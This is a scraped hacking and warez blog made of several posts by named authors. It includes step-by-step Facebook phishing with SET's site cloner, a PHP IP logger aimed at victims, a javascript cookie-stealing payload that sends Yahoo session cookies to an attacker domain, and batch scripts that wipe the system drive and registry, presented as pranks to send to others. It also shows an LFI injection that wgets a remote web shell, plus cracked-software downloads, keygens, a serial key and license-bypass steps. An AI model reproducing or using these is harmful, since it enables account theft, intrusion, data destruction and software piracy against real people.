Hacking Equipments | C/C++ Coding | Updates:: Did you tried Our Online ? AdobePhotoshop |

Hack Facebook Account With Back Track

4 Comments


Assalam-0-Alaikum ,


                                Hope You Guys are at your best me to :p but Actually Not Facebook , I Am Going To Reveal A New Facebook Hack For You . This Time I am Using Backtrack 5 (OS).

Note : Try At Your Own Risk Any Data Loss or disastrous is Not Our Responsibility !!

Lets Hack Your friends Facebook account :p




STEP - By - STEP Facebook Hack




Step 1 :


Open set Tool in Backtrack 5 : To open it follow the step shown in Below Figure .






Step 2 :


Time to set the Website Attack Vectors >>>> Below Menu enter your choice

>> 2.Website Attack Vectors and press Enter .






Step 3 :


Select your Attacking Method , Here i choose


3. Credential Harvester Attack Method.





Step 4 :


Select Attack Vectors :

write 2. Site Cloner and press enter as shown in the image .








Step 5:


Enter the Url: To make a clone to Facebook login page I entered https://www.facebook.com and press enter . As I press enter it will automatically generate a clone page .




Step 6 :


To continue the process you have to put * sign and press enter.





Step 7 :


Process will continue as shown in the image above .







Step 8:


Open terminal and enter ifconfig command . It will shown your ip address . Now copy the ip address






Step 9 :


Open Web Browser and Paste the system ip address into Address bar and it will redirect to the Facebook login page .






Now Enter your anything to check it will work or not .


FOR EXAMPLE: Here IS Used


Email : h4x00r

Password: HackedAccount



And Press Enter . Let see what happen After This .







Step 10 :


In step 7 the process start you remember now when you follow step 8 and step 9 ,then it will come up with all the details of Username and Password .



This Is How Most Of The Hackers Set A trap For Facebook Users To Hack Them. and Grab there id and password.

Note: Again  This article is just for Educational purpose only . Do at your own risk.

Regards,
Zulqurnain jutt

Get IP through PHP Script

3 Comments





Okay Folks, today I am gonna show you how to grab someone Ip address using PHP script.This method can be used to grab someone Ip address on yahoo or Facebook chat or by sending mail to victim. So Lets get started with any further discussion



PHP Script :-


Copy the below codes into Notepad and save it as Grab.php (.php is must) 



<?php
header('LOCATION: http://h4ck3rcracks.com');
$ip = $_SERVER['REMOTE_ADDR'];
$filename = "IPAddress".date("jMY");
$filename =$filename.".txt";
$file=fopen($filename,"a+");
fwrite($file,"**********************");
fwrite($file,"\r\nDate : ");
fwrite($file,date("j D M Y"));
fwrite($file,"\r\nTime : ");
fwrite($file,date("g:i a e")); 
fwrite($file,"\r\n**********************");
fwrite($file,"\r\nIP ADDRESS : ");
fwrite($file,$ip);
fwrite($file,"\r\n**********************");
fwrite($file,"\r\n\r\n");
fclose($file);
?>

code updated[12/2/13] by Zulqurnain jutt


Now make Free account on any of the free web hosting sites 000webhost or on My3gb .
Now upload Grab.php to your web hosting site.
Copy the link of your uploaded file and send it to victim.
As soon as victim will click on your link his ip will be saved in your free web hosting site.
Enjoy you are Done !!




I hope you like this dirty little trick.I will be back with some more trick so stay tune.but for this i need to go so, See you and Good Bye.



Regards,
Danish Raza

Artisteer v 3.1.0.48375 Multilingual + Keygen

1 Comments





Artisteer is the first and only Web design automation product that instantly creates fantasticlooking, >>
unique website templates and blog themes.
Artisteer allows for some automation of web design in the sense of being able to successfully assemble a usable Web template from random elements without user intervention. The user invokes the automation feature by selecting the "Suggest Design" option, and can then review the suggested random design. Theoretically this method can produce an unlimited number of original Web designs.

The term "Web Design Automation" (a registered mark of iRadek Software), is now more and more commonly being used to describe www.H4ck3rCracks.com these and other forms of software that essentially remove the need to perform many of the traditional task associated with web design and web deployment.



Features:



  • Design awesome blogs and cool web templates in minutes
  •  Export to Blogger, Joomla, Wordpress and other CMS products
  • No need to learn Photoshop, CSS, HTML or other technologies
  • Fun and easy to use!
  • New in version 3: create complete websites and blogs, edit pages, write content, and publish online!
  • New in version 3: preview, download and edit online website and template samples!


Top Reasons to use Artisteer:


  • Generate cool Web design ideas.
  • Adjust generated designs to create great looking Web and Blog templates.
  • Create perfectly correct, validated HTML and CSS that conform to Web standards.
  • You don't need to learn Photoshop, www.H4ck3rCracks.com CSS, HTML and other Web technologies to create great looking designs, >>including images and buttons.
  • If you are a Web designer, generate ideas, prototypes and quick Websites for your clients and friends.
  • Choose and use many included design elements, from backgrounds to photo objects and buttons.
  • Automatically solve problems with image aliasing, Web browser compatibility and other details requiring >>time and knowledge.
  • Learn how to create professional HTML and CSS code.
  • Save money on Wordpress Themes and Web design templates.
  • If you don't have the time, hire your kids to create great looking web design for you.


System Requirements:


Development Environment:
Intel or AMD processor 1500 MHz or higher
100Mb free disk space
512 Mb RAM or higher
Microsoft Windows XP, Vista, Windows 7
Microsoft .NET

Framework 2.0, 3.0 or 3.5. The .NET Framework 2.0



Browsers Compatibility:

Internet Explorer 6+
Firefox 2+
Opera 9+
Safari 1+
Google Chrome 1+



Download From Torrent:


Kindly Read Instructions Before Download





[Instructions] How To Download And Install?


1. Download the Torrent using Utorrent and Install this program.
2. Run the program and select"activate", copy no. installation
3. Run Keygen, in the right place paste the code of your install, keygen automatically generate a license >>
number and the No. activation.
4. Paste the generated numbers to the right place at the activation window. Click OK.
5. Enjoy the fully activated program! :p



Thanks For Your Kind Feed Backs and keep requesting software's and games :)


Regards,
Zulqurnain jutt

AVS Video Converter v8.3 with Crack Full Version Free Download

0 Comments




Convert video between all key formats: DVD, AVI, MP4, WMV, 3GP, QuickTime, SWF, MPEG, M4V, RM, DVR-MS, MKV, FLV, Blu-ray. Convert HD-video: M2TS, AVCHD, TOD, MOD, HDV. Save your time and use Batch mode--convert several video files at one go. Convert video for various devices such as iPod, iPad, Nintendo, Sony PSP, Blackberry, etc. Use editing tools to rotate video, add titles and credits, apply audio and video effects. Add specially designed menus and burn files on to DVD/Blu-ray discs. Upload video to popular web-hostings Youtube, Facebook, MySpace directly from the program interface.

Screenshot:



System Requirement:



Minimum System Requirements:



  • Processor: Intel / AMD compatible at 1.86 GHz or higher.
  • RAM: 1 GB or higher.
  • Sound: Windows compatible sound card.
  • Windows Media Player 11 or higher for WMV video playback.
  • DirectX: Microsoft DirectX 9.0c or later.

Windows 8/Windows 7 Recommended System Requirements:


  • Processor: AMD / Intel Core 2 Duo compatible at 2.4 GHz or higher 
  • RAM: 2 GB or higher 
  • Video: Windows 8/Windows 7 compatible video card 
  • Sound: Windows 8/Windows 7 compatible sound card


Download:


MediaFire:



FileFactory:


PutLocker:



RapidGator:



ShareOnline:



Bitshare:



SendSpace:



ASfile:



ShareBeast:



Crocko:



ZippyShares:



Sendmyway:



FreakShare:





Installation Procedure:


  • Download the setup. 
  • Extract it using Winrar. 
  • Run the setup. 
  • After Setup installed. 
  • Close the program. 
  • Copy the Crack File. 
  • Paste the Crack file in installed folder. 
  • Enjoy Full Version AVS Video Converter. 


Regards:
HASEEB MUGHAL

Internet Download Manager 6.14 built 5 + Patch

5 Comments



Internet Download Manager (IDM) is a tool to increase download speeds by up to 5 times, resume and schedule downloads. Comprehensive error recovery and resume capability will restart broken or interrupted downloads due to lost connections, network problems, computer shutdowns, or unexpected power outages. Simple graphic user interface makes IDM user friendly and easy to use.Internet Download Manager has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads. Unlike other download managers and accelerators Internet Download Manager segments downloaded files dynamically during download process and reuses available connections without www.H4ck3rCracks.com additional connect and log in stages to achieve best acceleration performance.
Internet Download Manager supports proxy servers, ftp and HTTP protocols, firewalls, redirects, cookies, authorization, MP3 audio and MPEG video content processing. IDM integrates seamlessly into Microsoft Internet Explorer, Netscape, MSN Explorer, AOL, Opera, Mozilla, Mozilla Firefox, Mozilla Fire bird  Avant Browser, MyIE2, and all other popular www.H4ck3rCracks.com browsers to automatically handle your downloads. You can also drag and drop files, or use Internet Download Manager from command line. Internet Download Manager can dial your modem at the set time, download the files you want, then hang up or even shut down your computer when it's done.

Other features include multilingual support, zip preview, download categories, scheduler pro, sounds on different events, HTTPS support, queue processor, html help and tutorial, enhanced virus protection on download completion, progressive downloading with quotas (useful for connections that use some kind of fair access policy or FAP like Directly, Direct PC, Hughes, etc.), built-in download accelerator, and many others.

IDM 6.14 is especially compatible with Windows 8  ,

and also compatible with other windows.


Download From :



Link 1     Or    Link 2    Or     Link 3    Or    [MIRROR1


password: www.H4ck3rCracks.com


How To Download And INSTALL?


1) Download the IDM from any of the above given links , and Extract It Using Winrar.

2) Install setup .

3) After Setup is installed just close the IDM  from Taskbar.

4) Now open Patch Folder and open patch  with Admin rights.

5) Now Click on path , if Ask you location of file it is normally in 
C:/program files/Internet Download Manager/IDM.exe
6) Now You Have Successfully patched your Latest Idm Enjoy :p


Wuff Finally i also installed a good version with windows 8 compatibility IDM its Cool .

Regards,
Zulqurnain jutt

Yahoo Account Hacking by Session Hijacking/Stealing Cookie

0 Comments
Hello everyone I hope everyone is fine and good.This is Danish Raza again with the tutorial that you need i know know! you people will not read these line and will be willing to read method below so,i will not bother you anymore,Go ahead below and have a look below the tutorial that is made specially for you people =P


Cookies Hijacking:-


So,Pals ! have look below the Following Steps:
This is very Simple Tutorial and working..


Step 1:


Download this Script link is checked several times and it is working fine so far,i hope you will people have no problem.


Step 2:


Download and extract files into your hard drive.


Step 3:


Create a account in any ftp hosting site i suggested 000webhost.


Step 4:


Login to your account and upload 4 files into your ftp account.Check this out screenshot below:




Step5:


Give this code to victim to run in his browser when he would be logged in to his yahoo account.

Yahoo.php is basically cookie stealing script and hacked.php executes the stolen cookies in browser.Stolen cookies get stored in directory 'cookies'

javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));
He would again redirected to his yahoo account.

Step6: 


Open the hacked.php. The password is 'explore'.
                       

You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password.


Regards,
Danish Raza

Notpad Disastrous Codes and Tips

0 Comments


Assalam-0-Alaikum,

TRY THESE ALL TRICKS AND SCRIPTS AT YOUR OWN RISK.




The blue screen of Death [dangerous]

*The Blue Screen Of Death can be coded and sent to you like any application. It is up to you to be carefully and try to reveal the trick before getting in serious trouble. It loops a message asking to re-install your windows again

SCRIPT:


@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Stupidity Shutdown


*This pops up a funny message then will shutdown the computer

SCRIPT:


@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c "Error! You are too stupid!" -s -t 10


Delete Key Registry Files [VERY DANGEROUS!! USE AT RISK]


*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)

SCRIPT:



@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been Hacked ;p. Have a nice day.
GOTO MESSAGE

Endless Notepads


*This will pop up endless notepads until the computer freezes and crashes*

SCRIPT:


@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Crazy caps lock


*This constantly turns caps lock on and off really fast continuously*

SCRIPT:

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop


Endless Enter


*This constantly makes it so the enter button is being pressed continuously *

SCRIPT:


Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop



Endless Backspace


*This makes it so the backspace key is constantly being pressed*

SCRIPT:


MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop


Popping CD Drives


*This will make the CD drives constantly pop out*

SCRIPT:



Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop



These all codes are not obviously mine :p but sharing is caring :D

Regards,
Zulqurnain jutt

Comodo Internet Security 2013 PRO with Serial Key

23 Comments

Comodo Internet Security Pro 2013 , however, takes a very different route. There’s no spam filter here. No parental controls, or backup tool. And it won’t add warning icons to your web page search results. Instead, the program concentrates very much on the core security basics: detecting and removing known malware immediately, while preventing even brand new threats from causing any damage.

This doesn't mean the suite is under powered  though. You still get strong real-time and on-demand scanning, and a firewall to block network attacks, as well as automatic sand boxing and a very configurable host intrusion protection system (HIPS).


And if all that sounds a little complex,www.H4ck3rCracks.com Comodo Internet Security Pro 2013 will make most security decisions on its own, no need for prompts or alerts. And if you do have problems, the suite actually includes a live chat component where you can talk to a technician, who might then (for instance) connect to your PC and help you remove a virus.

Sounds promising. But would the reality live up to the marketing? We decided to find out.


Interface


Comodo Internet Security Pro 2013 installed quickly and without issues. Disk consumption was average at around 256MB, but RAM use was more than we expected, with the suite requiring multiple support processes (we counted 10, requiring around 75MB RAM on our test PC).

The interface seemed familiar, at least initially. A desktop widget displays your basic security status, and provides buttons to launch a few common tasks. A system tray icon does a little more, and you can also launch the core Internet Security Pro 2013 console, where again the most basic tasks (scans, updates and so on) are immediately visible. It’s all very straightforward and beginner-friendly.

If you’re a more experienced user,
www.H4ck3rCracks.com though, the new look and feel may not be so impressive. The opening screen makes poor use of screen real estate, with excessive white space, oversized graphics and more wasting perhaps half of the console area. We’d rather have seen more space devoted to an extra status pane or two.

And accessing the more advanced controls (firewall, sandbox, settings and more) can require multiple clicks, maybe 6 or more, as you head off to the program’s Task pane and drill down through various options to try and find what you need.

There are some things you can do to alleviate this. If you’d like immediate access to the "Stop Network Activity" button (which immediately kill your internet connection), for instance, then all you have to do is right-click it, and select "Add to Task bar . The option will then appear on the bottom of the main console, as well as the widget, making it quick and easy to find.

Still, on balance the Comodo Internet Security Pro 2013 interface feels like it still needs work. Beginners may be happy with the way it hides functionality, but the more experienced are likely to be left wishing it was just a little more configurable.


Scanning


Click "Scan" and Comodo Internet Security Pro 2013 offers four main scanning options.

The "Quick Scan" option checks your system’s most commonly infected areas. This took a slightly below par 6:49 to scan 44,463 objects on our test computer.

The regular "Full Scan" will scour your entire system. This performed relatively well on our test PC, scanning 869,864 objects in 25:09, although it may not look that way from the progress bar (it was still showing us around 33 percent complete when in fact there were only a couple of minutes to go).

Accuracy was acceptable, if not outstanding, with the program detecting and removing 85% of our test samples. As is often the case, we found Comodo Internet Security Pro 2013 also classed a lot of small utilities (some Nirsoft tools, for instance) as malware, but if you’re sure an alert is false then opt to ignore it and you won’t be hassled again.

The "Rating Scan" provides a cloud-based check on the reputation of key files on your system. A single table shows you the file’s age, whether it’s an auto run component, and its rating ("Trusted", "Unknown" or "Bad"). Another interface issue means the table isn't sort able, so for instance you can’t click the "Age" column header to view the most recent files together, but this is still useful when you’re manually hunting for problem files.

And a final "Custom Scan" option provides a host of other capabilities. It allows you to scan a specific file and folder, for instance; reconfigure exactly what the "Quick Scan" and "Full Scan" profiles do; add new profiles of your own; or set up scans to run automatically on a daily, weekly or monthly schedule.

Locating and setting up these options isn't quite as easy as it should be, unfortunately. As before, Comodo’s philosophy seems to be "bury the ‘advanced’ stuff in a corner somewhere and hope no-one minds". Still, there’s plenty of configuration here, and with a little work the program will soon be set up to suit your needs.

Sand boxing


Scanning is fine for protecting you against known threats, but of course brand new malware remains a problem. And so Comodo Internet Security Pro 2013 checks every program you run or install, alerting you to any which are unknown, and automatically running these in an isolated environment to limit the damage they can do.

Does this work? It’s hard to offer 100 percent guarantees, but we tried installing a few key loggers and similar tools, and if they weren't detected on launch, then they proved unable to log or track what we were doing. The sandbox restrictions may cause issues in some cases, but if you’re sure a program is safe then you can always tell Comodo not to isolate it again after the first run, and the auto sand boxing didn't produce any significant issues for us.

Comodo Internet Security Pro 2013 also provides buttons to run your browsers in the sandbox, when you know you might be visiting unknown untrusted websites. The idea being that even if you visit a site which is infected by something, it won’t be able to break out of the sandbox and reach your own PC.

And there’s even a Virtual Kiosk, a complete virtual desktop (complete with an on-screen keyboard to help defeat key loggers  where -- in theory -- you can install or run programs without them leaving any history behind on your real system.

One perhaps significant issue we noticed with the Kiosk is that, during one session, we tried to launch IE10 a couple of times with no apparent results. 
www.H4ck3rCracks.com Yet on closing the Virtual Kiosk, we found two new IE10 windows on our regular desktop. Which suggests it’s possible to launch a program in what you think is a safe environment, but have it actually run, and have some level of access to your normal PC.

This may not be quite as bad as it seems, because after noticing the problem once, we were unable to reproduce it. And so, while worrying, we can’t rule out the possibility that the issue might have been some rare problem specific to our own setup.

There are other complications, though, including the need to manually "reset" the sandbox occasionally (delete files accumulated by virtual applications). The system doesn't do this itself, you must manually click a "Reset Sandbox" button, and the cleanup process doesn't always work correctly. On one occasion, we found the Virtual Kiosk would no longer launch, displaying a "User data corrupted, please reset sandbox" message: we duly clicked the Reset button, but got the same error again (and again, and again…), and only rebooting restored normal operations.

And there’s more…


Comodo Internet Security Pro 2013 also provides a firewall, which does a capable job of blocking network attacks. It’s reasonably configurable, and by default won’t hassle you with annoying alerts.

Experienced users will appreciate the highly configurable host intrusion detection system, which monitors all the processes running on your PC and provides a huge amount of control over what they can, and cannot do.

If you’re a Windows expert then you’ll love KillSwitch, a powerful extension of Process Hacker with all kinds of tools to help you manually track down malware.

And, of course, there are the two main additions which distinguish Comodo Internet Security Pro 2013 from the free edition.

The "$500 Virus-Free Guarantee", for instance, promises that if your PC gets infected by malware and can’t be restored to normal working order, they’ll cover pay up to $500 to cover the cost of a repair "by a Comodo certified service". Which sounds good, but this only applies in the US, doesn't cover losses (you can’t add up the cost of lost profits, files or data, say), and you have to comply with several other conditions. Check the official EULA for more.

What’s more interesting is the inclusion of Comodo GeekBuddy, a live 24/7 technical support service. Whether you've an issue with Comodo, a virus you want to remove, a software configuration difficulty, a Windows problem or whatever, you can ask for help. A built-in chat client allows you to describe your problem, and the technician at the other end is then able to remotely connect to your system (with your permission) and try to fix things.

This proved more responsive than you might think. In our tests, we managed to reach someone quickly, within around a minute. The technicians were polite and generally did their best to help, although not necessarily for long; when we reported our Virtual Kiosk "User data corrupted" error, for instance, our helper simply closed and restarted Comodo, saw the issue was unchanged, and suggested we download and install the program again. Other queries were more successful, though, and on balance GeekBuddy remains a very effective way to get decent technical help, whenever you need it -- a major plus.

Would you benefit from Comodo Internet Security Pro 2013 ? The program remains too complex for total PC beginners, we suspect. The average user will appreciate its largely automatic operation, though, while experts enjoy the powerful tools and extreme configure ability. And if you’ll make even occasional use of GeekBuddy, in particular, then the current low price makes Comodo Internet Security Pro 2013 look like a very good deal.

Comodo Internet Security Pro 2013 works on Windows XP SP2, Vista, 7, 8 (all 32 and 64-bit editions) 




Download It Free From :



Link 1    Or     Link 2     Or     Link 3     Or     [MIRRORS]


Serial Key :


daa36d13-d5f8-4a22-9b09-16cfcf7d763d



How To Download & Install?


1) Download the Software from any of the above given Link And Then Extract it using Winrar if it is zip file :p

2) Now Just follow Instructions for installing as program said ,

If email Required use :

d.jcrew@ymail.com


For Serial Enter :


daa36d13-d5f8-4a22-9b09-16cfcf7d763d

3) Now Enjoy 365 days (1 year ) :p


Its Very Rare special thanks to Zaid Sparrow For Sharing. Kindly like my post and share it for your friends, KINDLY MAKE MIRRORS AND SHARE LINK WITH US IN COMMENTS :) :p

Regards,
Zulqurnain jutt

Hotspot Shield 2.65 Elite 2012-2013 Cracked By Shak

38 Comments


Hotspot Shield protects your entire web surfing session, securing your connection at both your home Internet network & Public Internet networks (both wired and wireless). Hotspot Shield free proxy protects your identity by ensuring that all web transactions (shopping, filling out forms, downloads) are secured through HTTPS. Hotspot Shield also makes you private online, making your identity invisible to third party websites and ISP‘s. Unless you choose to sign into a certain site, you will surf anonymously during your entire web session with Hotspot Shield.

We love the web because of the freedom that it creates to explore, organize, and communicate. Hotspot Shield VPN www.H4ck3rCracks.com Client enables access to all information online, providing freedom to access all web content freely and securely. Secure your entire web session and ensure your privacy online; your passwords, credit card numbers, and all of your data is secured with Hotspot Shield. The standard antivirus software protects your computer, but not your web activities. That‘s why AnchorFree is pleased to offer Hotspot Shield. Our application keeps your Internet connection secure, private, and anonymous.

100% Secured Through a VPN


Hotspot Shield creates a virtual private network (VPN) between your laptop or iPhone and our Internet gateway. This impenetrable tunnel prevents snoopers, hackers, ISP‘s, from viewing your web browsing activities, instant messages, downloads, credit card information or anything else you send over the network. Hotspot Shield security application is free to download, employs the latest VPN technology, offers best Wi-Fi security and is easy to install and use.


OS Requirements:



  • Windows XP/Vista/7/8



Download From:


Link 1      or        Link2      or      Link3     or      [MIRRORS]


Password: www.H4ck3rCracks.com



How to Crack and Install?


1) Just download the file from any one of the given link and Extract it using Winrar.

2) Now Just Copy paste the below code lines at the end of hosts file. 
[You can open hosts file by just opening notepad with admin rights and  drag and drop the hosts file present in c:/Windows/system32/drivers/etc   location.]

127.0.0.1 anchorfree.net
127.0.0.1 rss2search.com
127.0.0.1 techbrowsing.com
127.0.0.1 box.anchorfree.net
127.0.0.1 www.mefeedia.com
127.0.0.3 www.anchorfree.net
127.0.0.2 www.mefeedia.com
127.0.0.1 hsselite.com
127.0.0.1 www.hsselite.com


After pasting lines on the end of hosts file just save it [press CTRL + S]

4) You Can see that i have given two folders one is HC-1 and other is HC-2  , you just have to open HC-1 folder and install setup present in it , While Installing unchecked for installing toolbar , and unchecked Launch After Installation.  [After Installing without opening hotspot Restart You PC]

5) After you log-in just goto HC-2 folder and install setup present in it now basically we are updating it, and again unchecked for installing toolbar and unchecked for launch after installation. [After Installing without opening hotspot Restart You PC] .

6) Now Run the hotspot from Desktop and enjoy Elite hotspot without any ads :p.


I have received more than 300 mails to post the Hotspot shield again and working crack so ,this is the result Credit goes to shak madleets.com :p

Regards,
Zulqurnain jutt

LFI Shell Upload Via the proc/self/environ method

0 Comments

Assalam-O-Alaikum,


Did you ever uploaded shell of LFI Vulnerabilities,well many of you have done it with tough way ,lets see How This Method Will be simple for you.

This Topic Is Linked With My Previous Topic Of  LFI Vulnerabilities , so if you don't know what i am talking about then reading this trick is useless first read LFI Vulnerabilites So Lets Start I Have Decided this into 4 Parts To Make It  Simple.



  • Introduction 
  •  /proc/self/environ
  •  PHP injection 
  •  Accessing the shell 


1. Introduction


Remember  LFI vuneraility am sure you are? This is a tutorial on how to get the shell on the website with a site vulnerable to LFI.

Here is the example of a code that is vulnerable to LFI:


<?php
// LFI Vulnerable Code
$redirect = $_GET[redirect];
include($redirect);
?>

It is vulnerable because


$redirect is not sanitized, therefor include($redirect); will read off $_GET[page];.

Here is a example of LFI on Unix (very old):

http://www.example.com/redirect.php?.../../etc/passwd (Unix)
http://www.example.com/redirect.php?.../../etc/shadow (Linux)
http://www.example.com/redirect.php?.../master.passwd (FreeBSD)


2. proc/self/environ


To check if it is vulnerable, we enter this in the ../ part:
../../../../../proc/sef/environ

If you get something like


 DOCUMENT_ROOT=SKDOISAJUF()&@#%(#*%, etc... (That means it is vulnerable.)

If you get only a blank page, it isn't vulnerable.


3. PHP Injection


Now, let's access it and use Tamper Data to change the user agent to this:


<?system('wget http://gonullyourself.org/shell.txt -O gonullyourself.php');?>

Now, submit the request.

Our command will be executed.


4. Accessing the shell


To check if the command got executed, we will enter something like this:

http://www.google.ca/gonullyourself.php



If our shell is there, the command was successfully executed.  Easy nuh :p special thanks to rGod at insecurity.ro

Regards,
Zulqurnain jutt

By-pass Websense -Complete Way To Open Blocked Website and Restrictions

35 Comments


Tutorial On Websense & Blocked Site :-


Hello Friends welcome at HC,it's me Danish! Today I am going to share a tutorial on " How to Unlock or Bypass Websense to Access sites in Home or Anywhere". Important thing to note that is This technique is also applicable to bypass or hack any firewall like Cyberoam etc. You may know about the fact that , Most offices has Websense Firewall to restrict the access to various websites. Sometimes this frustrates users as they are not being able to browse things freely.So guys let see

Reasons To Restrict User :-






First of all I would like to provide basic information about Websense. How it works and restricts users to access web freely . Websense blocks the website on basis of two things :

  • Category: Websense divides all the Websites over the internet in some categories like commercial, Business, Entertainment etc. Websense blocks the particular category completely means all websites of that categories are blocked. 
  • Based on Meta Keyword : Websense regularly identifies certain keywords and add them to its database of blocked keywords. Now if any of these keyword is included in the Website TITLE or URL then it will be automatically blocked. 
  • Gourmet Restriction: For example Youtube in Pakistan:-(


TECHNIQUES TO BYPASS OR UNBLOCK OR WEBSENSE :-


  • Cached Copy Hack

Please keep this IMPORTANT thing in mind that This hack doesn't work on Websites blocked by second Websense Technology described above. But all the websites blocked by first category can be easily accessed.learn up to see what is difference between these categories.

Example:

When you search anything using Google In the each search result there are two things in blue color prior to URL i.e Cached and Similar. To view that blocked Website You have to click on Cached as Shown on the snapshot:
Just click on on that and open it ,Most Websites can be opened using this Technique but some websites require some more efforts. You have to do some more ting like you have to remove certain codes from the Cached URL for example if there is code like q=45mmfd5 then just remove that code and see it will be worked another way is given below that see below..








Hope this will help you to access almost all blocked websites except social networking one’s.


  • Finding a Good Proxy


You can also bypass Websense using several proxy sites. important to note also that most of the proxy sites will be blocked after one or two days. So you have to search for proxies regularly. But I have an easy method to find proxies So i have decided to share it too just read below kindly..
you have to use the cached copy hack to find the daily proxy websites as..
Method to Find Proxy:

Open the Google and In search Query column type "tech-faq Proxy" without quotes. Now open the Cached copy of the website. Here you will find daily new proxy list now you have to copy the proxy URL’s and check for working Proxies.
Now using proxy you can unblock any Website but I will advice don’t open Social Networking sites and Emails using these.

  • Virtual Operating System(Cloud Computing ):


For Opening Gmail ,gtalk,Yahoo, Hotmail means all email clients you can use virtual operating system. For this you have to register on cloud computing website. After that you will get Virtual computer online which you can use anywhere in the world just you need a internet connection.i am also sharing Virtual OS below :

Some Virtual Operating Websites are:


To Bypass or Unblock Downloading RESTRICTION:

Restrictions always include some of the downloading facts like In most corporate offices or in PTCL connections ,if the site is blocked and video or anything related to blocked site is try to downloaded then Downloading always got failed even without opening Websites Too. So, you have download restrictions. I will tell you the basic simple method to bypass all downloading restrictions. Just follow the following instructions.

  • Open the Internet Explorer
  • Now, go to Tools 
  • There will be a Internet Options 
  • It is the time to Click on Security Tab
  • Under That , Now Click on internet Icon and then on default level .
  • Then click on Local Internet and then again on default level and then on Trusted Sites and Again on default level , OK we have made changes let save them by clicking On apply.
  • Now you will be able to download anything without any restriction. Enjoy happy downloading.



I hope you Like our Guide to unrestricted internet and made available to you.This is Danish Raza saying Good Bye To all :) and Please Subscribe and Share our Post and check out who's below that effort,see below the Author Box.


Regards,
Danish Raza

Internet Explorer 10 Free Download For win7(32Bit & 64Bit) and win Server2008

0 Comments


Microsoft Internet Explorer 10 :-


Internet Explorer 10 that is also known as IE10 , is the version of the Internet Explorer web browser.this new version of IE was released by Microsoft in 2012, and is the default browser in Windows 8.


For Windows 7 and Later :-


Microsoft released the first  "IE10 Platform Preview" On 12 April 2011, which runs only on Windows 7 and later. While the second platform preview was also available for Windows 7 and later. The first preview release came four weeks after the final release of Internet Explorer 9. IE 10 reached general availability on 4 September 2012 as a component of Windows Server 2012. A preview of IE 10 for Windows 7 was made available for download in November 2012.

IE10 expands on Internet Explorer 9 functionality with regard to CSS3 support, hardware acceleration, and HTML5 support. On Windows 8, it is divided into two editions with different user interfaces. first one is a Metro app that does not support plug-ins and a traditional desktop application that retains plug-in support. On 64-bit computers, the Metro edition runs in 64-bit mode by default. The desktop edition can be run in 64-bit mode by enabling Enhanced Protected Mode.


Additional Features :-


  • User interface
  • Adobe Flash integration
  • Flip Ahead
  • Html 5


Mobile version :-

At the Windows Phone Developer Summit in June 2012, Joe Belfiore announced Windows Phone 8 due towards the end of 2012, which will include a mobile version of Internet Explorer 10 that offers four times faster JavaScript performance and two times more support for HTML5 features. It includes Microsoft SmartScreen and supports touch in HTML5 apps.

System requirements:-

Processor:


  • 1 gigahertz (GHz) 32-bit (x86) OR 64-bit (x64) processor. 

Operating system:

  • Windows 7 32-bit with Service Pack 1 (SP1) or higher 
  • Windows 7 64-bit with Service Pack 1 (SP1) or higher 
  • Windows Server 2008 R2 with Service Pack 1 (SP1) 64-bit 

Memory:

  • Windows 7 32-bit—512 MB 
  • Windows 7 64-bit—512 MB 
  • Windows Server 2008 R2 64-bit—512 MB 
  • Hard drive space 
  • Windows 7 32-bit—70 MB 
  • Windows 7 64-bit—120 MB 
  • Windows Server 2008 R2 64-bit—200 MB 

Additional Things:

  • Drive 
  • CD-ROM drive (if installation is done from a CD-ROM) 
  • Display 
  • Super VGA (800 x 600) or higher-resolution monitor with 256 colors 

Download Now :-


It is The Official Link Of Download Internet Explorer 10 By Microsoft.You will have to choice to select the Desire Language and your Operating system to download.Approximately all Language that supports IE are present to choose Plus Windows 7 , vista and server are available on OS selection of IE.So,Enjoy this IE gift from Microsoft.



Happy Download! i hope you enjoy the article.All I want is to share the post with friends.Please Subscribe to get daily updates for free.and Like us on facebook too.
Astalavista!


Regards,
Danish Raza

Bioshock 2 PC game Download Torrent Link

1 Comments



BioShock 2 is a first-person shooter video game developed by 2K Marin forMicrosoft Windows, PlayStation 3 and Xbox 360. The sequel to the 2007 video game BioShock, it was released worldwide on February 9, 2010. The Mac OS X version of the game was released by Feral Interactiveon March 30, 2012.

The game is set in the fictional underwater dystopia of Rapture. The game opens with a cutscene set in 1958 then jumps 10 years to when Delta wakes up in 1968, eight years after the events of the first BioShock. The protagonist and player-controlled character is an Alpha series of Big Daddy, a being that has been mentally conditioned to protect Little Sisters which is amongst the first of its kind. The player-controlled character Big Daddy, named Subject Delta who was previously paired with a single Little Sister, reactivates with no recollection of the past decade's events and scours the city in an attempt to relocate the Little Sister that he was paired with. Fearing this reunion will ruin her plans for the city, Sofia Lamb, the antagonist, sends out her spliced up followers that she calls "The Rapture Family" and new Big Sisters in an attempt to deter Delta.



Multiplayer



BioShock 2 features a story driven multiplayer mode where the player takes on the role of a citizen of Rapture. Set in 1959, just before the events of BioShock, the player chooses to take on the role of a splicer fighting in Rapture's civil war. The player is being sponsored by the Plasmid manufacturer, Sinclair Solutions, to test out their weapons, Plasmids, and Tonics in a consumer reward program. As the player progresses through the multiplayer experience, new weapons, Tonics, and Plasmids will be unlocked (provided by Sinclair) in addition to the story of the Rapture civil war being told.

